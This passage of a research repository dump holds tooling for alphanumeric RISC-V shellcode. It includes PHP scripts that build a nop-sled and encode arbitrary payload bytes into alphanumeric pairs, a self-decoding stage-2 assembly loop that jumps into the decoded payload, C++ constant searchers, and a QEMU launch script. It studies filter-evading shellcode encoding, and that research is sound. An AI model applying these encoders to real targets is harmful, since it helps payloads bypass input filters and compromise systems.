55 | if($n464 < 0) {
56 | 	die("Oops. Please improve the algorithm (3).");
57 | }
58 | 
59 | $r448 = $n464*$v464 + $n448*$v448 - $xp_offset;
60 | if(($r448%2) !== 0) {
61 | 	die("Oops. Please improve the algorithm (4).");
62 | }
63 | $end_nopsled = $r448 / 2;
64 | 
65 | $s = ".macro xp_fixup\n".
66 | 	 sprintf("    # n464:%d n448:%d\n", $n464, $n448).
67 | 	 str_repeat("    addi XP, XP, 464\n", $n464).
68 | 	 str_repeat("    addi XP, XP, 448\n", $n448).
69 | 	 ".endm\n".
70 | 	 ".macro end_nopsled\n".
71 | 	 sprintf("    # len:%d\n", $end_nopsled).
72 | 	 str_repeat("    dangerous_nop2\n", $end_nopsled).
73 | 	 ".endm\n";
74 | file_put_contents($args['o'], $s);
75 | 
76 | ?>


--------------------------------------------------------------------------------
/baremetal/tick/insert.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	function error($errno, $errstr, $errfile, $errline) {
 9 | 		throw new ErrorException($errstr, $errno, 0, $errfile, $errline);
10 | 	}
11 | 	set_error_handler('error');
12 | 
13 | 	$args = getopt('i:p:v:t:o:');
14 | 
15 | 	$s = file_get_contents($args['i']); /* Input file */
16 | 	$p = file_get_contents($args['p']); /* Payload */
17 | 	$v = file_get_contents($args['v']); /* step6 offset to compute pool offset */
18 | 	$v = intval($v, 16);
19 | 	$t = file_get_contents($args['t']); /* stage2 sp shift */
20 | 	$t = intval($t, 10);
21 | 	$b = $v - 0x1000 + 4 + (16*$t) - 1952;  /* Sync with stage2 start load address and store offset */
22 | 	$maxpayload = 0x400; /* It is possible to increase it with minor work */
23 | 
24 | 	if(strlen($p) > $maxpayload) {
25 | 		printf("Payload too large: %d/%d\n", strlen($p), $maxpayload);
26 | 		exit(-1);
27 | 	}
28 | 	printf("insert: %d bytes from offset:0x%x\n", 2*strlen($p), $b);
29 | 	for($i=0; $i<min($maxpayload, strlen($p)); $i++)
30 | 	{
31 | 		/* [Notation: capital letters are hex digits]
32 | 		 * We want to encode byte 'XY' in alnum bytes 'KA' 'LB'.
33 | 		 * The equation to solve (see stage2.S) is:
34 | 		 * XY == KA ^ BK, ('XY'€[0;255], 'KA' and 'LB' alnum]
35 | 		 */
36 | 		$q = ord($p[$i]);
37 | 		$wanted_bottom  = $q & 0xF;
38 | 		$wanted_top = ($q >> 4) & 0xF;
39 | 
40 | 		$low_top = 0x4;
41 | 		if($wanted_bottom == 0x4) {
42 | 			$low_top = 0x6;
43 | 		}
44 | 		$low_bottom = $wanted_bottom ^ $low_top;
45 | 
46 | 		$high_bottom = $wanted_top ^ $low_top;
47 | 		$high_top = ($high_bottom == 0) ? 0x5 : 0x4;
48 | 
49 | 		$low  = ($low_top << 4) + $low_bottom;
50 | 		$high = ($high_top << 4) + $high_bottom;
51 | 
52 | 		$s[$b+2*$i  ] = chr($low);
53 | 		$s[$b+2*$i+1] = chr($high);
54 | 
55 | 		//printf("INS: %X -> %X %X\n", $q, $low, $high);
56 | 	}
57 | 	file_put_contents($args['o'], $s);
58 | ?>
59 | 


--------------------------------------------------------------------------------
/baremetal/tick/l:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | CMD="qemu-system-riscv64 -nographic -machine sifive_u -device loader,file=shellcode.bin,addr=0x80000000"
3 | #CMD="qemu-system-riscv64 -gdb tcp::1235 -machine sifive_u -device loader,file=shellcode.bin,addr=0x80000000 -S"
4 | echo "$CMD"
5 | ${CMD}
6 | 


--------------------------------------------------------------------------------
/baremetal/tick/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RischardV/riscv-alphanumeric-shellcoding/c3f3b1b445ef2b198963a6cbffd04d6f9559c000/baremetal/tick/shellcode.bin


--------------------------------------------------------------------------------
/baremetal/tick/st2/README.txt:
--------------------------------------------------------------------------------
1 | Steps:
2 | 1. rm -rf build
3 | 2. mkdir build
4 | 3. ./genst2.php
5 | 4. make -j{nCPUS}
6 | 5. ./l
7 | 


--------------------------------------------------------------------------------
/baremetal/tick/st2/genst2.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | $reg_list_C  = ["s0", "s1", "a0", "a1", "a2", "a3", "a4", "a5"];
 9 | $reg_list_XS  = ["ra", "sp", "gp", "tp", "t0", "t1", "t2",
10 |                  "a6", "a7", "s2", "s3", "s4", "s5", "s6",
11 |                  "s7", "s8", "s9", "s10", "s11",
12 |                  "t3", "t4", "t5", "t6"
13 |                 ];
14 | 
15 | function pc_next_permutation($p, $size) {
16 |     for ($i = $size - 1; @$p[$i] >= $p[$i+1]; --$i) { }
17 |     if ($i == -1) { return false; }
18 |     for ($j = $size; $p[$j] <= $p[$i]; --$j) { }
19 |     $tmp = $p[$i]; $p[$i] = $p[$j]; $p[$j] = $tmp;
20 |     for (++$i, $j = $size; $i < $j; ++$i, --$j) {
21 |          $tmp = $p[$i]; $p[$i] = $p[$j]; $p[$j] = $tmp;
22 |     }
23 |     return $p;
24 | }
25 | 
26 | function add_with_reg($nb, $XA, $XB, $XP, $XQ, $XS, $XJ) {
27 |     $s = sprintf("#define XA %s\n".
28 |                  "#define XB %s\n".
29 |                  "#define XP %s\n".
30 |                  "#define XQ %s\n".
31 |                  "#define XS %s\n".
32 |                  "#define XJ %s\n".
33 |                  "#include \"../st2_core.S\"\n",
34 |                  $XA, $XB, $XP, $XQ, $XS, $XJ);
35 | 
36 |     file_put_contents("build/".$nb.".S", $s);
37 | }
38 | 
39 | @mkdir("build");
40 | @mkdir("build/x");
41 | 
42 | $perm_size = count($reg_list_C) - 1;
43 | $perm = range(0, $perm_size);
44 | $j = 0;
45 | do {
46 |     if(($perm[5] > $perm[6]) || ($perm[6] > $perm[7])) {
47 |         continue; /* we only use up to 4 */
48 |     }
49 |     foreach($reg_list_XS as $XS) {
50 |         add_with_reg($j,
51 |                      $reg_list_C[$perm[0]], $reg_list_C[$perm[1]], $reg_list_C[$perm[2]],
52 |                      $reg_list_C[$perm[3]], $XS, $reg_list_C[$perm[4]]);
53 |         ++$j;
54 |     }
55 | } while ($perm = pc_next_permutation($perm, $perm_size));
56 | printf("Done:%d.\n", $j);
57 | 
58 | $mk = '
59 | RV_ABI    := rv64gc
60 | include ../../scripts/common.mk
61 | 
62 | all: try
63 | 
64 | # $1: number
65 | define build_block =
66 | build/$1.x: build/$1.S
67 | 	@tmpfile=`mktemp build/tmp.XXXX` && \
68 | 	 (riscv64-unknown-elf-gcc -P -E $$^ | riscv64-unknown-elf-as -march=$(RV_ABI) - -o $$$$tmpfile) && \
69 | 	 riscv64-unknown-elf-objcopy -O binary $$$$tmpfile $$@ && \
70 | 	 rm $$$$tmpfile
71 | 
72 | all: build/$1.x
73 | endef
74 | 
75 | #NB := $(shell find build/ -name "*.S" | wc -l)
76 | #$(eval NB=$(shell echo $$(($(NB)-1))))
77 | #$(foreach I, $(shell echo  {0..$(NB)}), $(eval $(call build_block,$(I))))
78 | ';
79 | $mk2 = 'all: ';
80 | for($i=0; $i<$j; $i++) {
81 |     $mk .=
82 | "build/".$i.".x: build/".$i.'.S
83 | 	@tmpfile=`mktemp build/tmp.XXXX` && \
84 | 	 (riscv64-unknown-elf-gcc -P -E $^ | riscv64-unknown-elf-as -march=$(RV_ABI) - -o $$tmpfile) && \
85 | 	 riscv64-unknown-elf-objcopy -O binary $$tmpfile $@ && \
86 | 	 rm $$tmpfile
87 | ';
88 |     $mk2 .= 'build/'.$i.'.x ';
89 | }
90 | $mk .= $mk2 ."
91 | try: try.cpp
92 | 	g++ -O3 -std=gnu++11 -march=native -ffp-contract=on -Wall -Wextra -Wconversion $< -o $@
93 | ";
94 | file_put_contents("Makefile", $mk);
95 | 
96 | ?>


--------------------------------------------------------------------------------
/baremetal/tick/st2/l:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | set -euo pipefail
 3 | 
 4 | CPU=$(getconf _NPROCESSORS_ONLN)
 5 | STAGE2=$(find build/ -name "*.x" | wc -l)
 6 | STEP=$((${STAGE2} / ${CPU}))
 7 | 
 8 | echo "l: CPU:${CPU} Stages2:${STAGE2} STEP:${STEP}"
 9 | for (( COUNTER=0; COUNTER<${STAGE2}; COUNTER+=${STEP} )); do
10 |     END=$((${COUNTER}+${STEP}))
11 |     END=$(($END<${STAGE2}?$END:${STAGE2}))
12 |     #echo ${COUNTER} ${END}
13 |     ./try ${COUNTER} ${END} &
14 | done
15 | 
16 | wait
17 | 


--------------------------------------------------------------------------------
/baremetal/tick/st2/loadgen.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * (c) 2018-2019 Hadrien Barral
  3 |  * SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | #include <cstdbool>
  7 | #include <cstdio>
  8 | #include <cstdlib>
  9 | #include <cstring>
 10 | #include <cstdint>
 11 | #include <cfenv>
 12 | #include <unistd.h>
 13 | 
 14 | /* See paper for algorithm explanation */
 15 | 
 16 | static_assert(sizeof(double) == sizeof(uint64_t));
 17 | union udouble {
 18 |     double d;
 19 |     uint64_t u;
 20 | };
 21 | 
 22 | #define GBN 63
 23 | static uint8_t GB[GBN] = {
 24 |     '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
 25 |     'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
 26 |     'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
 27 |     '`',
 28 | };
 29 | 
 30 | static bool isgb(uint8_t gb)
 31 | {
 32 |     return (gb >= '0' && gb <= '9')
 33 |         || (gb >= 'a' && gb <= 'z')
 34 |         || (gb >= 'A' && gb <= 'Z')
 35 |         || (gb == '`');
 36 | }
 37 | 
 38 | static inline uint64_t d2u(double d)
 39 | {
 40 |     udouble ud;
 41 |     ud.d = d;
 42 |     return ud.u;
 43 | }
 44 | 
 45 | static inline double u2d(uint64_t u)
 46 | {
 47 |     udouble ud;
 48 |     ud.u = u;
 49 |     return ud.d;
 50 | }
 51 | 
 52 | //__attribute__((noinline))
 53 | double fmadd(double a, double b, double c)
 54 | {
 55 |     return a*b + c;
 56 | }
 57 | 
 58 | #define FOUNDN 48
 59 | #define FOUND_MASK ((1UL << FOUNDN) - 1UL)
 60 | typedef struct {
 61 |     bool found[1UL << FOUNDN] = {0};
 62 |     size_t found_n = 0;
 63 |     double fix;
 64 | 
 65 |     int midx;
 66 |     uint64_t mulu;
 67 |     int aidx;
 68 |     uint64_t addu;
 69 | } t1_t;
 70 | 
 71 | static void t1_do(t1_t &t)
 72 | {
 73 |     double add = u2d(t.addu);
 74 |     double mul = u2d(t.mulu);
 75 |     double d = fmadd(mul, t.fix, add);
 76 | 
 77 |     uint64_t u = d2u(d);
 78 |     //printf("X: [0x%lx %e]*[FIX]+[0x%lx %e] == 0x%lx %e\n", t.mulu, mul, t.addu, add, u, d);
 79 |     if(t.found[u&FOUND_MASK] == 0) {
 80 |         t.found[u&FOUND_MASK] = 1;
 81 |         t.found_n++;
 82 |     }
 83 | }
 84 | 
 85 | static void t1_add(t1_t &t, int idx)
 86 | {
 87 |     if(idx < 0) {
 88 |         t1_do(t);
 89 |         return;
 90 |     }
 91 | 
 92 |     for(size_t i=0; i<GBN; i++) {
 93 |         t.addu &= ~(0xFFUL << (8*idx));
 94 |         t.addu |= ((uint64_t)GB[i]) << (8*idx);
 95 | 
 96 |         t1_add(t, idx-1);
 97 |     }
 98 | }
 99 | 
100 | static void t1_mul(t1_t &t, int idx)
101 | {
102 |     if(idx < 0) {
103 |         t1_add(t, t.aidx);
104 |         return;
105 |     }
106 | 
107 |     for(size_t i=0; i<GBN; i++) {
108 |         t.mulu &= ~(0xFFUL << (8*idx));
109 |         t.mulu |= ((uint64_t)GB[i]) << (8*idx);
110 | 
111 |         t1_mul(t, idx-1);
112 |     }
113 | }
114 | 
115 | void test1(void)
116 | {
117 |     t1_t t = {};
118 |     t.fix = u2d(0x4131555555555555UL);
119 |     t.mulu = 0x4131555555555555UL;
120 |     t.addu = 0x4261555555555555UL;
121 | 
122 |     t.midx = 2;
123 |     t.aidx = 1;
124 | 
125 |     t1_mul(t, t.midx);
126 | 
127 |     #if 1
128 |     uint64_t percent = (100*t.found_n) / (1UL << FOUNDN);
129 |     printf("FOUND[%zu/%lu]: %lu%%\n", t.found_n, 1UL << FOUNDN, percent);
130 |     #else
131 |     printf("FOUND[%zu]:\n    ", t.found_n);
132 |     for(size_t i=0; i<16; i++) {
133 |         for(size_t j=0; j<16; j++) {
134 |             printf("%d", t.found[16*i+j]);
135 |         } printf("\n    ");
136 |     } printf("\n");
137 |     #endif
138 | }
139 | 
140 | #define MANT_MASK 0x3FFFFFFFFFFFFUL
141 | typedef struct {
142 |     uint64_t add;
143 |     uint64_t mul;
144 | } t2_r_t;
145 | 
146 | typedef struct {
147 |     size_t found_n = 0;
148 |     double fix;
149 | 
150 |     uint64_t target;
151 |     uint64_t addu_base;
152 | 
153 |     int midx;
154 |     uint64_t mulu;
155 | } t2_t;
156 | 
157 | static bool isaddalnum(uint64_t addu)
158 | {
159 |     addu &= FOUND_MASK;
160 |     static_assert(FOUNDN % 8 == 0);
161 |     int shift = 0;
162 |     while(shift < FOUNDN) {
163 |         if(!isgb((addu >> shift) & 0xFFUL)) {
164 |             return false;
165 |         }
166 |         shift += 8;
167 |     }
168 |     return true;
169 | }
170 | 
171 | static bool t2_add(t2_t &t)
172 | {
173 |     double mul = u2d(t.mulu);
174 |     double prod = mul * t.fix;
175 |     uint64_t produ = d2u(prod);
176 | 
177 |     uint64_t produ_mant = produ & MANT_MASK;
178 | 
179 |     uint64_t add_mantb = ((t.target - produ_mant) << 1) & MANT_MASK;
180 | 
181 |     uint64_t addu = t.addu_base | add_mantb;
182 |     double add = u2d(addu);
183 |     double d = prod + add; //fmadd(mul, t.fix, add);
184 |     uint64_t u = d2u(d);
185 | 
186 |     t.found_n++;
187 |     //printf("*: [0x%lx %.16e]*[FIX]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target);
188 | 
189 |     if(!isaddalnum(addu)) {
190 |         return false;
191 |     }
192 | 
193 |     printf("Y: [0x%lx %.16e]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", produ, prod, addu, add, u, d, FOUNDN/4, t.target, t.found_n);
194 |     //printf("X: [0x%lx %.16e]*[FIX]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target);
195 | 
196 |     if((u&FOUND_MASK) != t.target) {
197 |         printf("error\n");
198 |         exit(1);
199 |     }
200 | 
201 |     return true;
202 | }
203 | 
204 | #if 0
205 | static bool t2_mul(t2_t &t, int idx)
206 | {
207 |     if(idx < 0) {
208 |         return t2_add(t);
209 |     }
210 | 
211 |     for(size_t i=0; i<GBN; i++) {
212 |         t.mulu &= ~(0xFFUL << (8*idx));
213 |         t.mulu |= ((uint64_t)GB[i]) << (8*idx);
214 | 
215 |         if(t2_mul(t, idx-1)) {
216 |             return true;
217 |         }
218 |     }
219 | 
220 |     return false;
221 | }
222 | #else
223 | static bool t2_mul(t2_t &t, int idx)
224 | {
225 |     int retries = 1000*1000;
226 |     srand(0U);
227 | 
228 |     while(retries > 0) {
229 |         for(int i=0; i<=idx; i++) {
230 |             t.mulu &= ~(0xFFUL << (8*i));
231 |             t.mulu |= ((uint64_t)GB[rand()%GBN]) << (8*i);
232 |         }
233 | 
234 |         if(t2_add(t)) {
235 |             return true;
236 |         }
237 |     }
238 |     return false;
239 | }
240 | #endif
241 | 
242 | 
243 | void test2(uint64_t target)
244 | {
245 |     if((target & FOUND_MASK) != target) {
246 |         printf("Bad target.\n");
247 |         exit(1);
248 |     }
249 | 
250 |     t2_t t = {};
251 |     t.fix = u2d(0x4131555555555555UL);
252 |     t.mulu = 0x4131555555555555UL;
253 |     t.addu_base = 0x4260000000000000UL;
254 | 
255 |     t.midx = 5;
256 | 
257 |     #if 0
258 |     for(uint64_t target = 0; target < (1UL << FOUNDN); target++) {
259 |         t.target = target;
260 |         t2_mul(t, t.midx);
261 |     }
262 |     uint64_t percent = (100*t.found_n) / (1UL << FOUNDN);
263 |     printf("FOUND[%zu/%lu]: %lu%%\n", t.found_n, 1UL << FOUNDN, percent);
264 |     #else
265 |     t.target = target;
266 |     t2_mul(t, t.midx);
267 |     #endif
268 | }
269 | 
270 | typedef struct {
271 |     size_t found_n = 0;
272 |     double fix;
273 | 
274 |     uint64_t target_A;
275 |     uint64_t target_B;
276 |     uint64_t addu_base;
277 | 
278 |     int midx;
279 |     uint64_t mulu;
280 | } t3_t;
281 | 
282 | static bool t3_add(t3_t &t, uint64_t &addu, double &prod, uint64_t target, double mul, bool sub)
283 | {
284 |     prod = mul * t.fix;
285 |     uint64_t produ = d2u(prod);
286 |     uint64_t produ_mant = produ & MANT_MASK;
287 | 
288 |     uint64_t add_mantb;
289 |     if(sub == false) {
290 |         add_mantb = ((target - produ_mant) << 1) & MANT_MASK;
291 |     } else {
292 |         add_mantb = (((produ_mant << 1) - target) << 0) & MANT_MASK;
293 |     }
294 | 
295 |     addu = t.addu_base | add_mantb;
296 | 
297 | #if 1
298 |     double d = prod + u2d(addu);
299 |     if(sub) {
300 |         d = prod - u2d(addu);
301 |     }
302 |     uint64_t u = d2u(d);
303 |     if((u&FOUND_MASK) != target) {
304 |         //printf("H: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", d2u(mul), mul, addu, u2d(addu), u, d, FOUNDN/4, t.target_A, t.found_n);
305 |         printf("G[%c]: [0x%lx %.16e]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", sub?'s':' ', produ, prod, addu, u2d(addu), u, d, FOUNDN/4, t.target_A);
306 |         printf("error target: have:0x%lx tgt:0x%lx [mul:%f]\n", u, target, mul);
307 |         exit(1);
308 |     }
309 | 
310 | #endif
311 | 
312 |     return isaddalnum(addu);
313 | }
314 | 
315 | static bool t3_third(t3_t &t, uint64_t &addu, double &prod, bool &n, uint64_t target, double mul)
316 | { //Note: fmadd and fnmsub lead to the same result (mantisse wise)
317 |     bool ret = false;
318 |     ret = t3_add(t, addu, prod, target, mul, 0);
319 |     if(ret) {
320 |         n = false;
321 |         return ret;
322 |     }
323 |     ret = t3_add(t, addu, prod, target, mul, 1);
324 |     if(ret) {
325 |         n = true;
326 |         return ret;
327 |     }
328 |     return ret;
329 | }
330 | 
331 | static bool t3_second(t3_t &t, long int retries)
332 | {
333 |     double mul = u2d(t.mulu);
334 | 
335 |     uint64_t addu; double prod; bool n;
336 |     bool ret = t3_third(t, addu, prod, n, t.target_A, mul);
337 |     if(!ret) {
338 |         return false;
339 |     }
340 |     double add = u2d(addu);
341 |     double d = prod + add; /* f(n)madd(mul, t.fix, add); */
342 |     uint64_t u = d2u(d);
343 | 
344 |     uint64_t B_addu; double B_prod; bool B_n;
345 |     ret = t3_third(t, B_addu, B_prod, B_n, t.target_B, mul);
346 |     if(!ret) {
347 |         return false;
348 |     }
349 |     double B_add = u2d(B_addu);
350 |     double B_d = B_prod + B_add; //fmadd(mul, t.fix, add);
351 |     if(B_n) {
352 |         B_d = B_prod - B_add;
353 |     }
354 |     uint64_t B_u = d2u(B_d);
355 | 
356 |     //printf("FIX: [0x%lx %.16e]\n", d2u(t.fix), t.fix);
357 |     printf("Y[%c]: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", n?'s':' ', t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target_A, retries);
358 |     //printf("y[%c]: [0x%lx %.16e]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", n?'s':' ', d2u(prod), prod, addu, add, u, d, FOUNDN/4, t.target_A, retries);
359 |     printf("Z[%c]: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", B_n?'s':' ', t.mulu, mul, B_addu, B_add, B_u, B_d, FOUNDN/4, t.target_B, retries);
360 |     //printf("z[%c]: [0x%lx %.16e]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", B_n?'s':' ', d2u(B_prod), B_prod, B_addu, B_add, B_u, B_d, FOUNDN/4, t.target_B, retries);
361 | 
362 |     //printf("X: [0x%lx %.16e]*[FIX]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target);
363 | 
364 |     return true;
365 | }
366 | 
367 | #if 0
368 | static bool t3_add(t3_t &t)
369 | {
370 |     double mul = u2d(t.mulu);
371 |     double prod = mul * t.fix;
372 |     uint64_t produ = d2u(prod);
373 | 
374 |     uint64_t produ_mant = produ & MANT_MASK;
375 | 
376 |     uint64_t add_mantb = ((t.target_A - produ_mant) << 1) & MANT_MASK;
377 | 
378 |     uint64_t addu = t.addu_base | add_mantb;
379 |     double add = u2d(addu);
380 |     double d = prod + add; //fmadd(mul, t.fix, add);
381 |     uint64_t u = d2u(d);
382 | 
383 |     t.found_n++;
384 |     //printf("*: [0x%lx %.16e]*[FIX]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target);
385 | 
386 |     if(!isaddalnum(addu)) {
387 |         return false;
388 |     }
389 | 
390 |     uint64_t B_add_mantb = ((t.target_B - produ_mant) << 1) & MANT_MASK;
391 |     uint64_t B_addu = t.addu_base | B_add_mantb;
392 |     double B_add = u2d(B_addu);
393 |     double B_d = prod + B_add; //fmadd(mul, t.fix, add);
394 |     uint64_t B_u = d2u(B_d);
395 |     if(!isaddalnum(B_addu)) {
396 |         return false;
397 |     }
398 | 
399 |     printf("Y: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target_A, t.found_n);
400 |     printf("Z: [0x%lx %.16e]*C+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx retries:%zu}\n", t.mulu, mul, B_addu, B_add, B_u, B_d, FOUNDN/4, t.target_B, t.found_n);
401 |     //printf("X: [0x%lx %.16e]*[FIX]+[0x%lx %.16e] == 0x%lx %.16e {TRGT:0x%0*lx}\n", t.mulu, mul, addu, add, u, d, FOUNDN/4, t.target);
402 | 
403 |     if((u&FOUND_MASK) != t.target_A) {
404 |         printf("error A\n");
405 |         exit(1);
406 |     }
407 | 
408 |     return true;
409 | }
410 | #endif
411 | 
412 | static bool t3_mul(t3_t &t, int idx)
413 | {
414 |     long int max_tries = 100*1000*1000;
415 |     long int retries = 0;
416 |     srand(0U);
417 | 
418 |     while(retries < max_tries) {
419 |         for(int i=0; i<=idx; i++) {
420 |             t.mulu &= ~(0xFFUL << (8*i));
421 |             t.mulu |= ((uint64_t)GB[rand()%GBN]) << (8*i);
422 |         }
423 | 
424 |         if(t3_second(t, retries)) {
425 |             return true;
426 |         }
427 |         retries++;
428 |     }
429 |     return false;
430 | }
431 | 
432 | void test3(uint64_t target_A, uint64_t target_B)
433 | {
434 |     if((target_A & FOUND_MASK) != target_A) {
435 |         printf("Bad target A.\n");
436 |         exit(1);
437 |     }
438 |     if((target_B & FOUND_MASK) != target_B) {
439 |         printf("Bad target B.\n");
440 |         exit(1);
441 |     }
442 | 
443 |     t3_t t = {};
444 |     t.fix = u2d(0x4131555555555555UL);
445 |     t.mulu = 0x4131555555555555UL;
446 |     t.addu_base = 0x4260000000000000UL;
447 | 
448 |     t.midx = 5;
449 | 
450 |     t.target_A = target_A;
451 |     t.target_B = target_B;
452 |     t3_mul(t, t.midx);
453 | }
454 | 
455 | int main(int argc, char *argv[])
456 | {
457 | #if 0
458 |     double fix = u2d(0x4131555555555555UL);
459 |     printf("Fix: %.10f 0x%016lx\n", fix, d2u(fix));
460 |     double mul = u2d(0x4131555555555555UL);
461 |     printf("Mul: %.10f 0x%016lx\n", mul, d2u(mul));
462 |     double add = u2d(0x4260000000000000UL);
463 |     printf("Add: %f 0x%016lx\n", add, d2u(add));
464 |     double d = fmadd(mul, fix, add);
465 |     printf("  X: %f 0x%lx\n", d, d2u(d));
466 | #endif
467 | 
468 |     std::fesetround(FE_UPWARD);
469 | 
470 | #if 0
471 |     test1();
472 | #endif
473 | 
474 | #if 0
475 |     if(argc != 2) {
476 |         fprintf(stderr, "Usage: %s <target>\n", argv[0]);
477 |         exit(1);
478 |     }
479 | 
480 |     uint64_t target = strtoull(argv[1], NULL, 16);
481 |     test2(target);
482 | #endif
483 | 
484 | #if 1
485 |     if(argc != 3) {
486 |         fprintf(stderr, "Usage: %s <target A> <target B>\n", argv[0]);
487 |         exit(1);
488 |     }
489 | 
490 |     uint64_t target_A = strtoull(argv[1], NULL, 16);
491 |     uint64_t target_B = strtoull(argv[2], NULL, 16);
492 |     test3(target_A, target_B);
493 | #endif
494 | }


--------------------------------------------------------------------------------
/baremetal/tick/st2/st2_core.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 |     fence.i            # 0 1 # FIXED
 7 |     lui  XQ, 0xfffff   # 2   # FIXED
 8 |     add  XQ, XQ, sp    # 3   # FIXED
 9 | 
10 |                        #     # These 3 can be interchanged freely
11 |     addi XS, XQ, 0x400 # 4 5
12 |     mv   XP, XQ        # 6
13 |     mv   XJ, XQ        # 7
14 | 
15 | next:
16 |     addi XP, XP, 2     # 8    # Can move quite freely in block
17 |     lw   XA, 4(XP)     # 9
18 |     mv   XB, XA        # 10
19 |     srli XB, XB, 4     # 11
20 |     xor  XA, XA, XB    # 12
21 |     sw   XA, 0(XQ)     # 13
22 |     addi XQ, XQ, 1     # 14
23 |     bltu  XQ, XS, next # 15 16
24 | done:
25 |     fence.i            # 17 18 # Can be moved up
26 |     jalr XJ            # 19
27 | 


--------------------------------------------------------------------------------
/baremetal/tick/st2/try.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * (c) 2018-2019 Hadrien Barral
  3 |  * SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | #include <cstdbool>
  7 | #include <cstdio>
  8 | #include <cstdlib>
  9 | #include <cstring>
 10 | #include <cstdint>
 11 | #include <cfenv>
 12 | #include <fcntl.h>
 13 | #include <set>
 14 | #include <sys/types.h>
 15 | #include <sys/stat.h>
 16 | #include <unistd.h>
 17 | #include <unordered_set>
 18 | 
 19 | /* See paper for algorithm explanation */
 20 | 
 21 | static_assert(sizeof(double) == sizeof(uint64_t),
 22 |               "invalid 'double' size");
 23 | union udouble {
 24 |     double d;
 25 |     uint64_t u;
 26 | };
 27 | 
 28 | #define GBN 63
 29 | static uint8_t GB[GBN] = {
 30 |     '0',
 31 |     '1', '2', '3', '4', '5', '6', '7', '8', '9',
 32 |     'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
 33 |     'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
 34 |     '\'',
 35 | };
 36 | 
 37 | static bool isgb(uint8_t gb)
 38 | {
 39 |     return (gb > '0' && gb <= '9')
 40 |         || (gb > 'a' && gb <= 'z')
 41 |         || (gb > 'A' && gb <= 'Z')
 42 |         //|| (gb == '\'')
 43 |         ;
 44 | }
 45 | 
 46 | static inline uint64_t d2u(double d)
 47 | {
 48 |     udouble ud;
 49 |     ud.d = d;
 50 |     return ud.u;
 51 | }
 52 | 
 53 | static inline double u2d(uint64_t u)
 54 | {
 55 |     udouble ud;
 56 |     ud.u = u;
 57 |     return ud.d;
 58 | }
 59 | 
 60 | //__attribute__((noinline))
 61 | double fmadd(double a, double b, double c)
 62 | {
 63 |     return a*b + c;
 64 | }
 65 | 
 66 | struct cache_hash {
 67 | public:
 68 |     size_t operator()(const __uint128_t n) const {
 69 |         uint64_t target_A = ((uint64_t) n);
 70 |         uint64_t target_B = ((uint64_t) (n >> 64));
 71 |         static_assert(sizeof(size_t) == sizeof(uint64_t), "bad cast to come");
 72 |         return target_A + target_B;
 73 |     }
 74 | };
 75 | 
 76 | std::unordered_set<__uint128_t, cache_hash> cache_bad;
 77 | std::unordered_set<__uint128_t, cache_hash> cache_good;
 78 | #define CACHE_PATH "build/x/%012lx-%012lx.b"
 79 | 
 80 | static void cache_add_local(bool good, __uint128_t target_AB)
 81 | {
 82 |     if(good) {
 83 |         cache_good.insert(target_AB);
 84 |     } else {
 85 |         cache_bad.insert(target_AB);
 86 |     }
 87 | }
 88 | 
 89 | static void cache_add(bool good, uint64_t target_A, uint64_t target_B)
 90 | {
